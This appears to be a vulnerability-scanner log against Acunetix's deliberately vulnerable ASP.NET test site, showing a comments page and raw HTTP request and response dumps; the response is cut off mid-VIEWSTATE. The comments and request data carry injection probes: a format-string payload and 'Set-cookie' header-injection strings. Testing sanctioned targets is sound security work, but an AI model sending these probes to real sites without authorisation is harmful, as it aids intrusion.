%1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Show / hide Request and Response
Request Header - size: 591 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:10 GMT Content-Length: 55419
Response Body - size: 55,419 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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